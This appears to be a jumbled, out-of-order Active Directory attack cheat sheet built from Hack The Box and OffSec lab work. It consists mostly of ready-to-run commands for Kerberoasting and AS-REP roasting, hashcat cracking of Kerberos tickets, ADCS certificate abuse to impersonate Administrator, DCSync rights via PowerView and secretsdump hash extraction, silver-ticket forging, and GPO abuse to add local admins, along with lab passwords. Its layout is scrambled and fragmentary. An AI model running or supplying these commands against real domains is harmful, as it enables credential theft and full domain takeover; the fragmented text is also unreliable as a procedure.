AD Enumeration & Exploits
AD Exploits
AD Quick Hits
AD Enumeration
Bloodhound Analysis
HINT
crackmapexec ldap  $trgt1 -u ryan.cooper -p NuclearMosquito3 -M adcs

targeted kerberoast

adcs vuln check

kerberoast

hint: require domain access or creds! Always try std kerberoast

std kerberoast

certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable

TIP
if an AD obj has genericwrite on another user object

remote

exploit shown below

on trgt

impacket-GetNPUsers -usersfile users.txt domain.name/ -no-pass -request

Make sure to use single quotes

impacket-GetUserSPNs -request -dc-ip $trgtdc domain.name/user

userfile

User list

format the contents, no \n

on trgt

.\Rubeus kerberoast /nowrap

targetedKerberoast.py -v -d 'target-domain.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40

single user

remote

as-rep

List all computers

MATCH (m:Computer) RETURN m

List all users

MATCH (u:User) RETURN u

List all active user sessions on machines

MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p

note:  if an SID is displayed -local Administrator session is indicated by RID 500 (last segment of the SID)

List users and group relation

MATCH p = (c:User)-[:MemberOf]->(m:Group) RETURN p

Find machines Domain Users can RDP into

match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' return p

Find what groups can RDP

MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p

Find groups that can reset passwords (Warning: Heavy)

MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p

Find groups that have local admin rights (Warning: Heavy)

MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p

Find all users that have local admin rights

MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p

Find all active Domain Admin sessions

MATCH (n:User)-[:MemberOf]->(g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = (c:Computer)-[:HasSession]->(n) return p

Find if unprivileged users have rights to add members into groups

MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p

Find an object in one domain that can do something to a foreign object

MATCH p=(n)-[r]->(m) WHERE NOT n.domain = m.domain RETURN p

Find kerberoastable users with a path to DA

MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p

List the groups of all owned users

MATCH (m:User) WHERE m.owned=TRUE WITH m MATCH p=(m)-[:MemberOf*1..]->(n:Group) RETURN p

As-Rep

Require DC reachability
Methodology:

  • No user list
  • User list
  • Authenticatd

crack tgt

impacket-GetNPUsers htb.local/ -request
  • Review Default Domain Policy - Inbound Control Rights
  • Find Workstations where Domain Users can RDP
  • Find Servers where Domain Users can RDP
  • Find Computers where Domain Users are Local Admin
  • Shortest Path to Domain Admins from Owned Principals
bloodhound-python -u <username> -p <pwd> -ns $trgt1 -d <domain.name> -c All

remote (creds required)

TIP
Require valid AD credentials only!

Review permissions:

  • enrollment
  • Object control
hashcat -m 18200 -a 0 user.asrep.txt /usr/share/wordlists/rockyou.txt  --force

note if you cannot crack the TGT you probably won't be able to pass it

No userlist

TIP
If you have a service account's password, you can potentially create a Silver Ticket. See AD exploit section

  • Search for the domain and see what objects have control over it
  • Search for the owned users and look for "Object control", "group" etc

Transfer files out (See 'Exfil files to Attacker' section)

faketime "$(ntpdate -q htb.lab | cut -d ' ' -f 1,2)" bloodhound-python -u svc-alfresco -p s3rvice -ns $trgt1 -d htb.local -c All

crack tgs

hashcat -m 13100 -a 0 user.kerbi.txt /usr/share/wordlists/rockyou.txt  --force

sudo neo4j start    (neo4j:password)

bloodhound

Import the results zip file into Bloodhound gui 

powershell -ep bypass

. .\sharphound.ps1

Invoke-BloodHound -CollectionMethods All -OutputDirectory C:\Users\Public\ 

impacket-GetNPUsers domain.name/user -request -no-pass

on trgt (access required)

bloodhound

certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication

certipy-ad req -u <username> -p <password> -target $trgt1 -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication

[libdefaults]
    default_realm = OFFSEC.COM
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
    fcc-mit-ticketflags = true

[realms]
OFFSEC.COM = {
kdc = dc01.offsec.com
#admin_server = dc01.offsec.com
}

[domain_realm]
.offsec.com = OFFSEC.COM

[libdefaults]  
default_realm = NAGOYA-INDUSTRIES.COM  
kdc_timesync = 1  
ccache_type = 4  
forwardable = true  
proxiable = true  
rdns = false  
dns_canonicalize_hostname = false  
fcc-mit-ticketflags = true  
  
[realms]  
NAGOYA-INDUSTRIES.COM = {  
kdc = nagoya.nagoya-industries.com  
# admin_server = nagoya.nagoya-industries.com
}  
  
[domain_realm]  
.nagoya-industries.com = NAGOYA-INDUSTRIES.COM

.\Rubeus asreproast /nowrap

3

AD SID

DCSync

Silver Ticket Exploit

(Get-ADDomain).DomainSID.Value

impacket-ticketer -nthash <user_hash>  -domain-sid <sid> -domain <domain.nam> -spn <SVC/spn_name> -user-id <500 Administrator>

net group 'target_group' <user> /add

impacket

$SecPass = ConvertTo-SecureString 'Passw0rd' -AsPlainText -Force

DCSync Exploit (powerview)

([adsisearcher]"samaccountname=<user>").findall().properties

Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred

certipy-ad auth -pfx administrator.pfx

modify: /etc/krb5user.conf accordingly. Change the realms as needed. See examples below:

use the kerberos option to authenticate to the service, e.g:

impacket-mssqlclient -k <server>.<domain.com>

targeted kerberoast

TIP
if an AD obj has genericwrite on another user object

rpcclient -U craig.carr --password Spring2023 nagoya-industries.com -c lsaquery

impacket-secretsdump 'aslam:Passw0rd@10.129.229.91' -just-dc-user Administrator -just-dc-ntlm

https://codebeautify.org/ntlm-hash-generator

service acc SPN

windapsearch -m user-spns -d nagoya-industries.com -u <user> -p <pwd>

ldapsearch -x -H ldap://$trgt1 -b "dc=nagoya-industries,dc=com" "(samAccountName=svc_mssql)" -D  svc_mssql -w Service1 | grep -i service

on attacker

on trgt

on trgt

on attacker

aclpwn -f svc-alfresco -t htb.local --domain htb.local --server 10.10.10.161

2

for l in $(cat creds.txt); do u=$(echo $l | cut -d ':' -f1); p=$(echo $l | cut -d ':' -f2); echo -e "SEARCHING AS USER: $u\n" && certipy-ad find -u $u -p $p -target $trgt1 -text -stdout -vulnerable; done

creds format:

user1:pass1
user2:pass2

update /etc/hosts if required

check locally running services

targetedKerberoast.py -v -d 'target-domain.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40

certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerable

Review permissions:

  • enrollment
  • Object control

TIP
if the trgt user has write/modify permission over the default group policy/main gpo

gpo abuse

./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <username> --GPOName "Default Domain Policy"

crackmapexec ldap  $trgt1 -u ryan.cooper -p NuclearMosquito3 -M adcs

identify vulnerable templates

Make sure to use single quotes

3

2

check with userlist (valid creds)

gpupdate /force

do if required...

1

  • NT HASH
  • USER SPN
  • DOMAIN SID

aclpwn

Extract Hashes

. .\powerview.ps1

$Cred = New-Object System.Management.Automation.PSCredential('htb.local\aslam', $SecPass)

Add-ObjectACL -PrincipalIdentity aslam -Credential $Cred -Rights DCSync

net group 'Exchange Windows Permissions' svc-alfresco /add; $username = "htb\svc-alfresco"; $password = "s3rvice"; $secstr = New-Object -TypeName System.Security.SecureString; $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}; $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr; Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'svc-alfresco' -TargetIdentity 'HTB.LOCAL\Domain Admins' -Rights DCSync

as oneliner

Add trgt user to writedacl grp

4

export KRB5CCNAME=$PWD/Administrator.ccache

ntlm hash

1

custom queries
Interactive Graph
Table Of Contents
As-Rep